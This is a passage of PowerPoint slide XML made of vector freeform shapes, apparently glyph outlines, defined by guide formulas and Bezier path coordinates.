                <a:gd name="T53" fmla="*/ 274 h 304"/>
                <a:gd name="T54" fmla="*/ 144 w 243"/>
                <a:gd name="T55" fmla="*/ 289 h 304"/>
                <a:gd name="T56" fmla="*/ 164 w 243"/>
                <a:gd name="T57" fmla="*/ 304 h 304"/>
                <a:gd name="T58" fmla="*/ 223 w 243"/>
                <a:gd name="T59" fmla="*/ 304 h 304"/>
                <a:gd name="T60" fmla="*/ 243 w 243"/>
                <a:gd name="T61" fmla="*/ 289 h 304"/>
                <a:gd name="T62" fmla="*/ 223 w 243"/>
                <a:gd name="T63" fmla="*/ 274 h 304"/>
                <a:gd name="T64" fmla="*/ 207 w 243"/>
                <a:gd name="T65" fmla="*/ 274 h 304"/>
                <a:gd name="T66" fmla="*/ 133 w 243"/>
                <a:gd name="T67" fmla="*/ 17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3" h="304">
                  <a:moveTo>
                    <a:pt x="133" y="177"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="194" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="120"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="120"/>
                    <a:pt x="232" y="120"/>
                    <a:pt x="232" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="89"/>
                    <a:pt x="219" y="89"/>
                    <a:pt x="212" y="89"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="135" y="89"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="89"/>
                    <a:pt x="115" y="89"/>
                    <a:pt x="115" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="120"/>
                    <a:pt x="127" y="120"/>
                    <a:pt x="135" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="153" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="5"/>
                    <a:pt x="70" y="0"/>
                    <a:pt x="53" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="12" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="45" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="12" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="97" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="304"/>
                    <a:pt x="117" y="304"/>
                    <a:pt x="117" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="274"/>
                    <a:pt x="105" y="274"/>
                    <a:pt x="97" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="73" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="274"/>
                    <a:pt x="144" y="274"/>
                    <a:pt x="144" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="304"/>
                    <a:pt x="156" y="304"/>
                    <a:pt x="164" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="223" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="304"/>
                    <a:pt x="243" y="304"/>
                    <a:pt x="243" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="274"/>
                    <a:pt x="230" y="274"/>
                    <a:pt x="223" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="17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07" name="Freeform 248">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38CC214D-168A-45AA-B005-41ADE52E60E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId48"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5389564" y="3257551"/>
              <a:ext cx="87313" cy="98425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 114 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 186 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 35 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 168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4" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="222"/>
                    <a:pt x="114" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="222"/>
                    <a:pt x="204" y="177"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="189" y="151"/>
                    <a:pt x="186" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="151"/>
                    <a:pt x="173" y="152"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="72" y="30"/>
                    <a:pt x="107" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="168"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08" name="Freeform 249">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D288F4E1-139A-450A-A61C-70D94C8E6FBB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId49"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5495926" y="3259138"/>
              <a:ext cx="95250" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 94 w 227"/>
                <a:gd name="T1" fmla="*/ 125 h 218"/>
                <a:gd name="T2" fmla="*/ 184 w 227"/>
                <a:gd name="T3" fmla="*/ 31 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 53 h 218"/>
                <a:gd name="T6" fmla="*/ 227 w 227"/>
                <a:gd name="T7" fmla="*/ 31 h 218"/>
                <a:gd name="T8" fmla="*/ 179 w 227"/>
                <a:gd name="T9" fmla="*/ 0 h 218"/>
                <a:gd name="T10" fmla="*/ 94 w 227"/>
                <a:gd name="T11" fmla="*/ 41 h 218"/>
                <a:gd name="T12" fmla="*/ 94 w 227"/>
                <a:gd name="T13" fmla="*/ 24 h 218"/>
                <a:gd name="T14" fmla="*/ 75 w 227"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 227"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 227"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 227"/>
                <a:gd name="T21" fmla="*/ 34 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 227"/>
                <a:gd name="T23" fmla="*/ 34 h 218"/>
                <a:gd name="T24" fmla="*/ 60 w 227"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 227"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 227"/>
                <a:gd name="T29" fmla="*/ 203 h 218"/>
                <a:gd name="T30" fmla="*/ 20 w 227"/>
                <a:gd name="T31" fmla="*/ 218 h 218"/>
                <a:gd name="T32" fmla="*/ 150 w 227"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 170 w 227"/>
                <a:gd name="T35" fmla="*/ 203 h 218"/>
                <a:gd name="T36" fmla="*/ 150 w 227"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 94 w 227"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 94 w 227"/>
                <a:gd name="T41" fmla="*/ 12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7" h="218">
                  <a:moveTo>
                    <a:pt x="94" y="125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="79"/>
                    <a:pt x="124" y="31"/>
                    <a:pt x="184" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="43"/>
                    <a:pt x="193" y="53"/>
                    <a:pt x="206" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="53"/>
                    <a:pt x="227" y="45"/>
                    <a:pt x="227" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="21"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="179" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="122" y="9"/>
                    <a:pt x="94" y="41"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="94" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="8"/>
                    <a:pt x="92" y="3"/>
                    <a:pt x="75" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="12" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="60" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="12" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="218"/>
                    <a:pt x="170" y="218"/>
                    <a:pt x="170" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="188"/>
                    <a:pt x="157" y="188"/>
                    <a:pt x="150" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="94" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94" y="12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09" name="Freeform 250">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACD6B3DA-537F-48FD-80D6-DB8376BFF1BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId50"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5610226" y="3360738"/>
              <a:ext cx="87313" cy="14288"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 182 w 206"/>
                <a:gd name="T1" fmla="*/ 35 h 35"/>
                <a:gd name="T2" fmla="*/ 206 w 206"/>
                <a:gd name="T3" fmla="*/ 17 h 35"/>
                <a:gd name="T4" fmla="*/ 182 w 206"/>
                <a:gd name="T5" fmla="*/ 0 h 35"/>
                <a:gd name="T6" fmla="*/ 24 w 206"/>
                <a:gd name="T7" fmla="*/ 0 h 35"/>
                <a:gd name="T8" fmla="*/ 0 w 206"/>
                <a:gd name="T9" fmla="*/ 17 h 35"/>
                <a:gd name="T10" fmla="*/ 24 w 206"/>
                <a:gd name="T11" fmla="*/ 35 h 35"/>
                <a:gd name="T12" fmla="*/ 182 w 206"/>
                <a:gd name="T13" fmla="*/ 35 h 35"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T12" y="T13"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="206" h="35">
                  <a:moveTo>
                    <a:pt x="182" y="35"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="35"/>
                    <a:pt x="206" y="35"/>
                    <a:pt x="206" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="0"/>
                    <a:pt x="188" y="0"/>
                    <a:pt x="182" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35"/>
                    <a:pt x="18" y="35"/>
                    <a:pt x="24" y="35"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="182"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10" name="Freeform 251">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D9395E4-C8F2-477A-BCFB-6870A68996DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId51"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5726114" y="3221038"/>
              <a:ext cx="77788" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 109 w 183"/>
                <a:gd name="T1" fmla="*/ 30 h 304"/>
                <a:gd name="T2" fmla="*/ 163 w 183"/>
                <a:gd name="T3" fmla="*/ 30 h 304"/>
                <a:gd name="T4" fmla="*/ 183 w 183"/>
                <a:gd name="T5" fmla="*/ 15 h 304"/>
                <a:gd name="T6" fmla="*/ 163 w 183"/>
                <a:gd name="T7" fmla="*/ 0 h 304"/>
                <a:gd name="T8" fmla="*/ 21 w 183"/>
                <a:gd name="T9" fmla="*/ 0 h 304"/>
                <a:gd name="T10" fmla="*/ 0 w 183"/>
                <a:gd name="T11" fmla="*/ 14 h 304"/>
                <a:gd name="T12" fmla="*/ 21 w 183"/>
                <a:gd name="T13" fmla="*/ 30 h 304"/>
                <a:gd name="T14" fmla="*/ 75 w 183"/>
                <a:gd name="T15" fmla="*/ 30 h 304"/>
                <a:gd name="T16" fmla="*/ 75 w 183"/>
                <a:gd name="T17" fmla="*/ 274 h 304"/>
                <a:gd name="T18" fmla="*/ 21 w 183"/>
                <a:gd name="T19" fmla="*/ 274 h 304"/>
                <a:gd name="T20" fmla="*/ 0 w 183"/>
                <a:gd name="T21" fmla="*/ 289 h 304"/>
                <a:gd name="T22" fmla="*/ 21 w 183"/>
                <a:gd name="T23" fmla="*/ 304 h 304"/>
                <a:gd name="T24" fmla="*/ 163 w 183"/>
                <a:gd name="T25" fmla="*/ 304 h 304"/>
                <a:gd name="T26" fmla="*/ 183 w 183"/>
                <a:gd name="T27" fmla="*/ 289 h 304"/>
                <a:gd name="T28" fmla="*/ 163 w 183"/>
                <a:gd name="T29" fmla="*/ 274 h 304"/>
                <a:gd name="T30" fmla="*/ 109 w 183"/>
                <a:gd name="T31" fmla="*/ 274 h 304"/>
                <a:gd name="T32" fmla="*/ 109 w 183"/>
                <a:gd name="T33" fmla="*/ 3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3" h="304">
                  <a:moveTo>
                    <a:pt x="109" y="30"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="163" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="30"/>
                    <a:pt x="183" y="30"/>
                    <a:pt x="183" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="0"/>
                    <a:pt x="170" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="21" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="75" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="21" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="163" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="304"/>
                    <a:pt x="183" y="304"/>
                    <a:pt x="183" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="274"/>
                    <a:pt x="170" y="274"/>
                    <a:pt x="163" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="109" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109"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11" name="Freeform 252">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0767B5C-A6F7-4E43-ABA9-9803B8C51B5E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId52"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5826126" y="3221038"/>
              <a:ext cx="95250" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 70 w 227"/>
                <a:gd name="T1" fmla="*/ 182 h 304"/>
                <a:gd name="T2" fmla="*/ 133 w 227"/>
                <a:gd name="T3" fmla="*/ 182 h 304"/>
                <a:gd name="T4" fmla="*/ 227 w 227"/>
                <a:gd name="T5" fmla="*/ 91 h 304"/>
                <a:gd name="T6" fmla="*/ 133 w 227"/>
                <a:gd name="T7" fmla="*/ 0 h 304"/>
                <a:gd name="T8" fmla="*/ 21 w 227"/>
                <a:gd name="T9" fmla="*/ 0 h 304"/>
                <a:gd name="T10" fmla="*/ 0 w 227"/>
                <a:gd name="T11" fmla="*/ 14 h 304"/>
                <a:gd name="T12" fmla="*/ 21 w 227"/>
                <a:gd name="T13" fmla="*/ 30 h 304"/>
                <a:gd name="T14" fmla="*/ 36 w 227"/>
                <a:gd name="T15" fmla="*/ 30 h 304"/>
                <a:gd name="T16" fmla="*/ 36 w 227"/>
                <a:gd name="T17" fmla="*/ 274 h 304"/>
                <a:gd name="T18" fmla="*/ 21 w 227"/>
                <a:gd name="T19" fmla="*/ 274 h 304"/>
                <a:gd name="T20" fmla="*/ 0 w 227"/>
                <a:gd name="T21" fmla="*/ 289 h 304"/>
                <a:gd name="T22" fmla="*/ 21 w 227"/>
                <a:gd name="T23" fmla="*/ 304 h 304"/>
                <a:gd name="T24" fmla="*/ 85 w 227"/>
                <a:gd name="T25" fmla="*/ 304 h 304"/>
                <a:gd name="T26" fmla="*/ 106 w 227"/>
                <a:gd name="T27" fmla="*/ 289 h 304"/>
                <a:gd name="T28" fmla="*/ 85 w 227"/>
                <a:gd name="T29" fmla="*/ 274 h 304"/>
                <a:gd name="T30" fmla="*/ 70 w 227"/>
                <a:gd name="T31" fmla="*/ 274 h 304"/>
                <a:gd name="T32" fmla="*/ 70 w 227"/>
                <a:gd name="T33" fmla="*/ 182 h 304"/>
                <a:gd name="T34" fmla="*/ 70 w 227"/>
                <a:gd name="T35" fmla="*/ 30 h 304"/>
                <a:gd name="T36" fmla="*/ 123 w 227"/>
                <a:gd name="T37" fmla="*/ 30 h 304"/>
                <a:gd name="T38" fmla="*/ 192 w 227"/>
                <a:gd name="T39" fmla="*/ 91 h 304"/>
                <a:gd name="T40" fmla="*/ 123 w 227"/>
                <a:gd name="T41" fmla="*/ 152 h 304"/>
                <a:gd name="T42" fmla="*/ 70 w 227"/>
                <a:gd name="T43" fmla="*/ 152 h 304"/>
                <a:gd name="T44" fmla="*/ 70 w 227"/>
                <a:gd name="T45" fmla="*/ 3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7" h="304">
                  <a:moveTo>
                    <a:pt x="70" y="182"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="133" y="182"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="182"/>
                    <a:pt x="227" y="137"/>
                    <a:pt x="227" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="44"/>
                    <a:pt x="190" y="0"/>
                    <a:pt x="133" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="21" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="36" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="21" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="85" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="304"/>
                    <a:pt x="106" y="304"/>
                    <a:pt x="106" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="274"/>
                    <a:pt x="93" y="274"/>
                    <a:pt x="85" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="70" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70" y="182"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="70" y="30"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="123" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="30"/>
                    <a:pt x="192" y="64"/>
                    <a:pt x="192" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="117"/>
                    <a:pt x="171" y="152"/>
                    <a:pt x="123" y="152"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="70" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70"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12" name="Freeform 253">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C9601C0-B3F4-425C-B9F5-A1B8B9F355E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId53"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5972176" y="3259138"/>
              <a:ext cx="26988" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 32 h 215"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 215"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 63 h 215"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 32 h 215"/>
